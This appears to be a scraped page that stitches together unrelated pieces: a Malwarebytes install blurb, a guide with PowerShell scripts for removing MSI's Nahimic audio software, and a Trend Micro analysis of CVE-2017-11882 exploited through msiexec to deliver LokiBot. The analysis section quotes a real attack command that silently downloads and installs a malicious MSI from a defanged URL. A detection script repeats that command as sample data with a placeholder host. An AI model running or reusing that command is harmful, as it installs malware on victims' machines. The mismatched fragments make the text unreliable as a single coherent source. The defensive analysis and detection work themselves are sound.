Malwarebytes Msi

admin 11/22/2021

Malwarebytes Anti-Malware is available to business customers via download from the Malwarebytes website. Once downloaded, you can install Malwarebytes Anti-Malware either by launching the setup file in the graphical user interface or by using the command line interface. This article guides you through installing via the command line interface.

Malwarebytes detects Windows registry changes caused by common Group Policy Objects as PUMs. Enabling this feature automatically excludes 18 registry keys. This ensures our protection capabilities do not interfere with common business applications or operating practices.

'Malwarebytes has vaporized ransomware, and it runs silently unless it detects a serious threat that we need to investigate. It has been outstanding.' Kevin Merolla, Global IT Security Engineer, Chart Industries.

A small number of our machines have created balloon tips that a new version of Malwarebytes Corporate v1.80.2.1012 is available and if I select the update option, the application is downloaded and updated to v1.80.2.1012, but I cannot find anywhere on the website any reference to the executable f.

February 20, 2021

For downloaded files (.exe, .msi, or dump files extracted from a zip archive), the malware uses the filename jesus or dump. For created .txt files, the filename varies between desktop.txt, desktop, and desktop.ini. The malware can also initiate a system shutdown.

Want to just completely uninstall Nahimic? Skip to the current instructions.

Is Nahimic malware or bloatware?

Like many MSI motherboard customers I’ve found a strange piece of software popping up on my computer called Nahimic. MSI touts it as some kind of breakthrough in audio, but it arrives bundled as bloatware, and as far as I can tell many would call it malware because of its behavior.

This comes as a suggested driver update that Microsoft Windows Update will install automatically.

When installed through a Windows update the software does NOT come with any mechanism to uninstall it. Nahimic will also re-install itself via a helper service upon reboot if you simply delete its executables. Furthermore, even if the helper service is disabled, the executables are deleted and the drivers are uninstalled, Windows will immediately reinstall Nahimic on the next update. Is this essentially malware behavior? You tell me.

Apparently there are several other ways you might be getting Nahimic. Some claim MSI bundles it with Dragon Center and apparently you can install it from Microsoft’s store. I hear the Dragon installed version is similarly insidious, but I imagine the store would let you uninstall it. I use neither, so I can’t confirm.

Uninstall

I initially checked out a reddit guide thread, which you can see in the earlier screenshot, but found it really didn’t stop this behavior: the next update would simply re-install this Nahimic garbage, which you can test by simply checking for updates. Another user suggested using group policy and linked to some documentation. I was successful with this method and sent the original poster a screenshot; I believe he has updated or will update the thread.

Steps to Disable Nahimic

Before we get started:
You will need to be a user with Administrator privileges. You will also need to pay attention to Windows Home vs. Pro/Enterprise instructions as they diverge in the guide.

Stopping Nahimic Helper Service

First we need to open the Services application, which manages Windows Services. This can be done by typing “Services” in the start menu search, or by right clicking on the Windows logo of the start menu button, selecting “Run”, and running services.msc. You will see a new screen; scroll down and find the Nahimic Service.

Double click on “Nahimic service” and press the Stop button.

Then select “Startup type: Disabled” and click Apply, then OK.

This will keep the service from messing with us while we work.

Killing Processes


The prior step should kill off Nahimic processes, but just in case we can double check. Open up Task Manager, which you can find in the start menu search bar, by right clicking on the windows logo of the start menu, or pressing Ctrl+Shift+Esc.

The two highlighted processes, if they exist, should be killed. Select them and press the “End task” button or right click and select “End task”.

Blocking Future Installations

This is where paths start to diverge. Pro users of Windows operating systems will be able to implement a much more robust solution than Home users to block future installs. Home users can try various tutorials online to install Group Policy Editor, and follow the Pro instructions, but this is not guaranteed to work.

Instead Home users can use a different solution that will at least prevent the same version of Nahimic from installing itself, which will require you to follow these steps whenever a new version of Nahimic comes out.

Windows 7/10 Pro & Enterprise Edition Instructions

Uninstalling Devices & Drivers

Type “Device Manager” into your search in the start menu or browse to it in the Control Panel. In this screen there are two drivers we’re interested in; the first is the “Nahimic mirroring device”, found under the “Sound, video and game controllers” section. Right click on it and select “Uninstall device”.

A new prompt will open, make sure to check “Delete the driver software for this device.” before clicking Uninstall.


Now you will do the same for the A-Volute device found in Software Components -> A-Volute Nh3 Audio Effects Component. Right click on it and select “Uninstall device”. Make sure “Delete the driver software for this device.” is checked and click Uninstall.

Use Driver Store Explorer to Delete Remaining Drivers

You should download this very nifty tool made by Teddy Z (lostindark) called Driver Store Explorer and unzip it somewhere on your computer. Now open up that folder and run it by double clicking on Rapr.exe. You should get a screen like this:

Here you should look for any entries from A-Volute or Nahimic. In my case I see that there is a leftover A-Volute inf file. I’m going to tick its checkbox and then tick the “Force Deletion” checkbox on the right panel and click “Delete Driver(s)”.

A box will ask you to confirm, you should go ahead and do so.

Blocking Nahimic Installs With Group Policy

Group policy is a feature available to Pro and Enterprise users which allows you to create custom rules for how Windows behaves. This is typically used in professional environments where such rules are important to the workloads, security, compliance, automation, and other concerns of a specific organization.

We will leverage this functionality to prevent Nahimic from infesting our systems. First you need to launch the policy editor, type “Edit group policy” into the start bar search and select it. Alternatively right click on the Windows logo of the start menu and select Run and type gpedit.msc.

With the policy editor open select Local Computer Policy -> Computer Configuration -> Administrative Templates -> System -> Device Installation -> Device Installation Restrictions.

Once you’ve clicked on the Device Installation Restrictions section you can now see a list of policy settings on the right side. You should select the “Prevent installation of devices that match any of these device IDs” policy and double click on it. A new window should open.


In this new window you should select the “Enabled” radio button on the left side and tick the “Also apply to matching devices that are already installed” checkbox on the left bottom.

Now click the “Show…” button which will open a new prompt. Here you can enter Device IDs line by line. Enter the following two device IDs:

Then click OK to close this prompt. Click Apply in the previous prompt and then OK.

You should now see that the policy is Enabled. Congrats, if you did all of this correctly devices with matching Device IDs should no longer be installable. You can now continue on to the cleanup section of the guide.

It is possible those IDs may change in the future. The way I found the IDs was to look at the properties of the two drivers we’re disabling in Device Manager. There I was able to get at the “Hardware Ids” (which are the Device IDs) from the Details tab.
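The following PowerShell script is an added example, not part of the original guide, that automates the Pro/Enterprise steps above: it stops and disables the helper service and leftover processes (the Services and Task Manager steps), reads the Hardware Ids from the two devices the way the Details tab shows them, and writes the same “Prevent installation of devices that match any of these device IDs” setting the Group Policy section configures by hand. It assumes an elevated session, the PnpDevice cmdlets (Windows 8.1/10 and later), that the service and devices can be matched by the names “Nahimic” and “A-Volute” the guide uses, and that the registry path below is the one this policy setting stores its values in. Because it discovers the IDs from the installed devices, run it before the Device Manager uninstall step, or supply IDs you recorded earlier.

```powershell
#Requires -RunAsAdministrator
# Added example (not the guide's own code). Assumptions: PnpDevice module present,
# devices/services identifiable by the name patterns below, and the policy registry
# path matches the Device Installation Restrictions policy used in the guide.

$Patterns = @('*Nahimic*', '*A-Volute*')

function Stop-NahimicService {
    # Services step: stop and disable any service whose display name matches,
    # so it cannot re-create files while we work.
    Get-Service | Where-Object { $_.DisplayName -like $Patterns[0] } | ForEach-Object {
        Stop-Service -Name $_.Name -Force -ErrorAction SilentlyContinue
        Set-Service  -Name $_.Name -StartupType Disabled
        "$($_.Name): stopped, startup type set to Disabled"
    }
    # Task Manager step: the guide shows the process names only in a screenshot,
    # so they are matched by prefix here (assumption).
    Get-Process | Where-Object { $_.ProcessName -like 'Nahimic*' } |
        Stop-Process -Force -ErrorAction SilentlyContinue
}

function Get-NahimicHardwareIds {
    # Read the "Hardware Ids" the guide takes from Device Manager's Details tab.
    $devices = Get-PnpDevice -FriendlyName $Patterns -ErrorAction SilentlyContinue
    $ids = foreach ($d in $devices) {
        (Get-PnpDeviceProperty -InstanceId $d.InstanceId `
            -KeyName 'DEVPKEY_Device_HardwareIds' -ErrorAction SilentlyContinue).Data
    }
    $ids | Where-Object { $_ } | Sort-Object -Unique
}

function Set-DeviceInstallDenyPolicy {
    param([string[]]$HardwareIds)
    if (-not $HardwareIds) { throw 'No hardware IDs found; nothing to block.' }
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\DeviceInstall\Restrictions'
    $list = Join-Path $base 'DenyDeviceIDs'
    New-Item -Path $list -Force | Out-Null
    # "Enabled" radio button and "Also apply to matching devices that are already installed"
    Set-ItemProperty -Path $base -Name DenyDeviceIDs            -Value 1 -Type DWord
    Set-ItemProperty -Path $base -Name DenyDeviceIDsRetroactive -Value 1 -Type DWord
    # The "Show..." list: one string value per ID, named 1, 2, 3, ...
    $i = 1
    foreach ($id in $HardwareIds) {
        Set-ItemProperty -Path $list -Name ([string]$i) -Value $id -Type String
        $i++
    }
    "Blocked $($HardwareIds.Count) hardware ID(s) via $base"
}

Stop-NahimicService
$ids = Get-NahimicHardwareIds
$ids | ForEach-Object { "Found hardware ID: $_" }
Set-DeviceInstallDenyPolicy -HardwareIds $ids
```

Writing the policy values directly takes effect after a reboot or `gpupdate /force`, but the Local Group Policy Editor will still show the setting as “Not configured”, and editing it there later will overwrite what the script wrote; if you want the setting visible in gpedit.msc, paste the IDs the script prints into the “Show…” dialog instead.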

Windows 7/10 Home Edition Instructions

Disabling Devices & Drivers

Type “Device Manager” into your search in the start menu or browse to it in the Control Panel. In this screen there are two drivers we’re interested in; the first is the “Nahimic mirroring device”, found under the “Sound, video and game controllers” section. Right click on it and select “Disable device”.

A prompt will ask you to confirm and you should do so. Now you will do the same for the A-Volute device found in Software Components -> A-Volute Nh3 Audio Effects Component. Right click on it and select “Disable device”.

Why do we disable devices instead of uninstalling them along with the drivers like Pro users? Because we’re not able to use Group Policy Editor to create a policy to block future installations. By leaving the devices and the service disabled Windows will think everything is fine during updates.

Unfortunately when a new version of the Nahimic software comes out, it is likely Windows will update and re-enable all of this. So far I’ve seen one such update in the last 4-5 months. Much better than every 24 hours!

Cleaning Up Loose Ends

We will now perform some final cleanup tasks and then give the computer a reboot.

Deleting Registry Entries

Nahimic has created a bunch of registry entries which we can now remove. In your start menu search type “Registry Editor” and open it. Alternatively right click on the Windows logo of the start menu, select Run, and type regedit.exe.

We want to delete the entries listed above. Select the first entry and paste it into the path block at the top of the Registry Editor, then press Enter. Now right click on the “NahimicService” entry on the left side of the screen and select Delete. Confirm that you want to do this when prompted.

Now do the same for the other two entries.

Deleting Stale Files

Nahimic has written files on your file system and it is worth deleting the following to avoid executing them:

To do this fire up File Explorer, which is the normal Windows file manager. You can also click on the “This PC” icon on your desktop. Navigate to the first location by browsing to C:\Windows\System32. Select the A-Volute folder and delete it.

There may also be other Nahimic files in System32, such as C:\Windows\System32\NahimicService.exe, which may also be worth deleting. If you’re following the Pro/Enterprise instructions, the earlier steps have typically removed those files already, so you may not find them.

Now if you type %LocalAppData% into your File Explorer path field you will be directed to your users Local Application Data folder. Here you can delete the NhNotifSys folder.

Reboot Your Computer & Run Windows Update

You should now reboot your computer. Once it’s back up run Windows Update. After it checks for updates you should verify that Nahimic is still gone. If you followed these steps it should be entirely absent from your system and blocked from future installs.

Windows Home users aren’t quite as lucky, as future versions of Nahimic will still get installed, but that isn’t as frequent as every Windows update and provides some relief.
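As an added post-reboot check (example code, not from the guide), the script below verifies that each artifact the cleanup and device sections removed is still gone after Windows Update has run: the service, the two devices, running processes, the files under System32 and %LocalAppData%, and (for Pro/Enterprise) the device-ID block policy. The file paths and names are the ones the guide lists; the policy registry path is assumed to be the one the Device Installation Restrictions setting writes, and Home users should expect only the policy check to report a finding.

```powershell
# Added example (not the guide's own code): report anything Nahimic-related that survived.

function Test-NahimicRemoved {
    $findings = [System.Collections.Generic.List[string]]::new()

    # 1. Service: should be absent, or at least Stopped with startup type Disabled
    Get-Service | Where-Object { $_.DisplayName -like '*Nahimic*' } | ForEach-Object {
        if ($_.Status -ne 'Stopped' -or $_.StartType -ne 'Disabled') {
            $findings.Add("service '$($_.Name)' is $($_.Status), startup type $($_.StartType)")
        }
    }

    # 2. Devices: Pro users expect none present; Home users expect them disabled (Status not OK)
    Get-PnpDevice -PresentOnly -ErrorAction SilentlyContinue |
        Where-Object { $_.FriendlyName -like '*Nahimic*' -or $_.FriendlyName -like '*A-Volute*' } |
        Where-Object { $_.Status -eq 'OK' } |
        ForEach-Object { $findings.Add("device '$($_.FriendlyName)' is present and enabled") }

    # 3. Running processes (name prefix is an assumption; the guide shows them in a screenshot)
    Get-Process | Where-Object { $_.ProcessName -like 'Nahimic*' } |
        ForEach-Object { $findings.Add("process $($_.ProcessName) (PID $($_.Id)) is running") }

    # 4. Files and folders the guide deletes
    $paths = @(
        (Join-Path $env:SystemRoot   'System32\A-Volute'),
        (Join-Path $env:SystemRoot   'System32\NahimicService.exe'),
        (Join-Path $env:LOCALAPPDATA 'NhNotifSys')
    )
    foreach ($p in $paths) { if (Test-Path $p) { $findings.Add("leftover path $p") } }

    # 5. Device-ID block policy (Pro/Enterprise only; assumed registry location)
    $pol  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\DeviceInstall\Restrictions'
    $deny = (Get-ItemProperty -Path $pol -Name DenyDeviceIDs -ErrorAction SilentlyContinue).DenyDeviceIDs
    if ($deny -ne 1) { $findings.Add('device-ID block policy not enabled (expected on Home edition)') }

    [pscustomobject]@{ Clean = ($findings.Count -eq 0); Findings = $findings.ToArray() }
}

$result = Test-NahimicRemoved
if ($result.Clean) { 'Nahimic appears fully removed.' } else { $result.Findings }
```

Run it once right after the reboot and again after the next monthly update; a device reappearing with Status OK is the signal that a new Nahimic version has shipped and the Home-edition steps need repeating.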

Conclusion

I think it’s entirely unreasonable that something this insidious is being bundled. MSI should certainly think about what it’s forcing on its customers. At this point I will definitely buy a different motherboard from their competition as this is unacceptable.

Users overwhelmingly do not want bundled software they can’t opt out of. Especially when said software launches itself out of the blue and takes over your audio. MSI is completely tone deaf with this move. Based on what appears to be a Nahimic rep’s posts on reddit so is the company that makes Nahimic.

Cyber Threats

Recently, we discovered CVE-2017-11882 being exploited again in an attack that uses an uncommon method of installation—via the Windows Installer service in Microsoft Windows operating systems.

Back in November 2017, Microsoft patched CVE-2017-11882, a remote code execution vulnerability that affected Microsoft Office. However, this didn’t prevent cybercrime groups such as Cobalt from exploiting this vulnerability in order to deliver a variety of malware, including FAREIT, Ursnif, and a cracked version of the Loki infostealer, a keylogger that was primarily advertised as capable of stealing passwords and cryptocurrency wallets.

This attack differs from previous malware that exploited the vulnerability using the Windows executable mshta.exe to run a PowerShell script that downloads and executes the payload. Instead, it uses msiexec.exe, part of the Windows Installer service.

Infection Chain

Figure 1. Infection Chain for the attack

The samples we analyzed seem to be part of a malware spam campaign. It starts off with an email that asks the recipient to confirm a payment they made to the sender. The email contains text written in Korean, which is roughly translated as “hello, please check if your PC may be infected by virus or malicious codes,” apparently to warn the recipient about possible infections.

The email also contains an attached document file labeled “Payment copy.Doc” (Detected by Trend Micro as TROJ_CVE201711882.SM) which is supposedly a payment confirmation document. However, the attachment is actually used to exploit CVE-2017-11882.

Figure 2. Spam email containing the document file used to exploit CVE-2017-11882

Figure 3. How the document will appear to the user

The exploitation of this vulnerability leads to the download and installation of a malicious MSI package labeled zus.msi via Windows Installer through the following command line:

Call cmd.exe /c msiexec /q /I “hxxps[:]//www[.]uwaoma[.]info/zus.msi”

Figure 4. msiexec download and installation. msiexec.exe gives the binary the file name MSIFD83.tmp

Figure 5. MSIL binary after installation

Once downloaded, Windows Installer (msiexec.exe) will proceed to install an MSIL or Delphi binary to the system. Depending on the MSI package downloaded, it may contain either a heavily obfuscated Microsoft Intermediate Language (MSIL) or Delphi binary file, which then acts as a loader for the actual payload.

One notable aspect of the package is that it provides a compression layer that file scan engines need to process and enumerate in order to detect the file as malicious. While this is relatively simple, being able to detect and identify the actual payload might be more difficult since it is contained in the heavily obfuscated MSIL or Delphi binary.

The binary launches another randomly-named instance of itself. This instance will be hollowed out and replaced with the malware payload.

Figure 6. Hollowed out instance of MSIL debugger view

So far, we have seen this technique used to deliver a sample we detected as LokiBot (TROJ_LOKI.SMA). However, it is modular enough to deliver other payloads.

Figure 7. The malware sample we identified as a LokiBot variant

Why does it use a new installation method?
Security software has become proficient at monitoring possible downloader processes such as Wscript, PowerShell, Mshta.exe, Winword.exe, and other similar executables that have become increasingly popular methods of installing malicious payloads. Due to their widespread use, it became easy to stop the arrival of threats via this software. However, the use of msiexec.exe to download a malicious MSI package is not something we typically see in most malware.

While other existing malware families use msiexec.exe, such as the Andromeda botnet (Detected by Trend Micro as ANDROM family), the difference is in how this method uses the installer. In Andromeda’s case, code is injected to msiexec.exe to download updates and download the payloads. Another key difference is that when Andromeda downloads its payloads and updates, it immediately downloads and executes a PE file. This method uses an MSI package that msiexec.exe recognizes as an installation package, thereby using Windows Installer as intended.

Malware has never really needed to install itself through an MSI package. Unlike most malware that use msiexec.exe, the malware we analyzed does so without modifying the binary or its processes, and uses the available functionality of Windows Installer to install malware. In addition, MSI packages are typically abused for malicious purposes to install Potentially Unwanted Applications (PUA) and not by malware per se. This is a new direction for malware creators.


Why the use of this specific installation type? We believe it might represent a new evasion mechanism for malware creators to skirt around security software that usually focuses on traditional installation methods. While we did manage to detect samples of the malware payload in limited numbers, we cannot definitively say if these samples are being delivered via the method described. What we can surmise, however, is that the malware creators might be focusing on Korean targets given the language used in the sample email. They could also be testing different ways of delivery — like this new attack method — to determine their effectiveness.

Mitigation
Given the use of phishing emails as the primary method of propagation, both users and organizations can mitigate the impact of this particular attack by implementing best practices designed to combat email-based threats.

Context is very important in this instance. For example, recipients should be suspicious of any email that asks for the confirmation of payment receipts or deliveries for non-existent transactions. Any unusual messages, sentences or phrases should also be a red flag for recipients. Again, in this case, the inclusion of a warning to check for any suspicious software is quite out of place in a supposed payment confirmation email. Communications that involve business transactions are also often highly professional, so any misspellings or grammatical errors, especially if excessive, could signify a phishing attempt.

Another option that is more specific to this attack would be to disable or restrict Windows Installer itself to prevent potential attackers from installing software on the user’s systems, or set the system to only install programs set up by a system administrator.
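As an added example from the defender's side (not code from the Trend Micro post), the script below does two things the analysis and mitigation sections point at: it flags the installation chain described above in process-creation telemetry, and it reports whether the Windows Installer restriction the mitigation mentions is in place. The events are constructed here in the shape of Sysmon Event ID 1 fields (Image, ParentImage, CommandLine, ProcessGuid, ParentProcessGuid); the URL is a placeholder, the GUIDs are made up, and the parent-chain walk back to the Office process is the assumption that lets the rule distinguish this chain from an administrator installing a local package from a shell. The DisableMSI value read at the end is the registry setting behind the “Turn off Windows Installer” policy, where 1 restricts installs to those deployed by an administrator and 2 turns the service off entirely.

```powershell
# Added example (not from the post). Sample events are constructed to mirror the
# chain described above: Office (Equation Editor) -> cmd.exe -> msiexec /q /I <URL>.
$SampleEvents = @(
    [pscustomobject]@{ ProcessGuid='{A1}'; ParentProcessGuid='{00}'
        Image='C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE'
        CommandLine='"EQNEDT32.EXE" -Embedding' },
    [pscustomobject]@{ ProcessGuid='{A2}'; ParentProcessGuid='{A1}'
        Image='C:\Windows\System32\cmd.exe'
        CommandLine='cmd.exe /c msiexec /q /I "https://example.invalid/zus.msi"' },   # placeholder URL
    [pscustomobject]@{ ProcessGuid='{A3}'; ParentProcessGuid='{A2}'
        Image='C:\Windows\System32\msiexec.exe'
        CommandLine='msiexec /q /I "https://example.invalid/zus.msi"' },
    # Benign comparison: an administrator installing a local package from a shell
    [pscustomobject]@{ ProcessGuid='{B1}'; ParentProcessGuid='{00}'
        Image='C:\Windows\System32\cmd.exe'; CommandLine='cmd.exe' },
    [pscustomobject]@{ ProcessGuid='{B2}'; ParentProcessGuid='{B1}'
        Image='C:\Windows\System32\msiexec.exe'
        CommandLine='msiexec /i C:\Temp\installer.msi /qn' }
)

function Find-RemoteMsiInstall {
    param([object[]]$Events)
    # Index by ProcessGuid so we can walk ancestry (Sysmon gives only the direct parent per event).
    $byGuid = @{}
    foreach ($e in $Events) { $byGuid[$e.ProcessGuid] = $e }

    foreach ($e in $Events) {
        if ([IO.Path]::GetFileName($e.Image) -ne 'msiexec.exe') { continue }
        $cl = $e.CommandLine
        # /i or /package followed by a URL: Windows Installer fetching the package itself
        $remote = $cl -match '(?i)[/-](i|package)\s+"?\s*(https?|ftp)://'
        if (-not $remote) { continue }
        $quiet = $cl -match '(?i)[/-](q|qn|quiet)\b'

        # Walk up the parent chain looking for an Office or Equation Editor ancestor.
        $ancestors = @(); $cur = $byGuid[$e.ParentProcessGuid]
        while ($cur) { $ancestors += [IO.Path]::GetFileName($cur.Image); $cur = $byGuid[$cur.ParentProcessGuid] }
        $officeOrigin = ($ancestors -join ';') -match '(?i)(winword|excel|powerpnt|outlook|eqnedt32)\.exe'

        [pscustomobject]@{
            Severity    = if ($officeOrigin) { 'high' } elseif ($quiet) { 'medium' } else { 'low' }
            Reason      = 'msiexec installing a package from a URL' + $(if ($officeOrigin) { ' spawned under an Office process' })
            Ancestry    = ($ancestors -join ' <- ')
            CommandLine = $cl
        }
    }
}

function Get-WindowsInstallerPolicy {
    # DisableMSI: absent/0 = unrestricted, 1 = only administrator-deployed installs, 2 = Windows Installer off
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    $v = (Get-ItemProperty -Path $key -Name DisableMSI -ErrorAction SilentlyContinue).DisableMSI
    switch ($v) { 1 { 'Admin-deployed installs only' } 2 { 'Windows Installer disabled' } default { 'Unrestricted' } }
}

Find-RemoteMsiInstall -Events $SampleEvents | Format-List
"Windows Installer policy: $(Get-WindowsInstallerPolicy)"
```

On the constructed input only the first chain is reported (severity high, ancestry `cmd.exe <- EQNEDT32.EXE`); the local `/i C:\Temp\installer.msi` install is not, because the rule keys on a URL argument rather than on msiexec itself. To feed it real data, replace `$SampleEvents` with objects built from `Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational'` filtered to Event ID 1.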

Trend Micro Solutions
Trend Micro™ Deep Security™ and TippingPoint provide virtual patching that protects endpoints from threats that abuse unpatched vulnerabilities.

Trend Micro XGen™ security provides a cross-generational blend of threat defense techniques against a full range of threats for data centers, cloud environments, networks, and endpoints. It features high-fidelity machine learning to secure the gateway and endpoint data and applications, and protects physical, virtual, and cloud workloads. With capabilities like web/URL filtering, behavioral analysis, and custom sandboxing, XGen™ protects against today’s purpose-built threats that bypass traditional controls, exploit known, unknown, or undisclosed vulnerabilities. Smart, optimized, and connected, XGen™ powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense.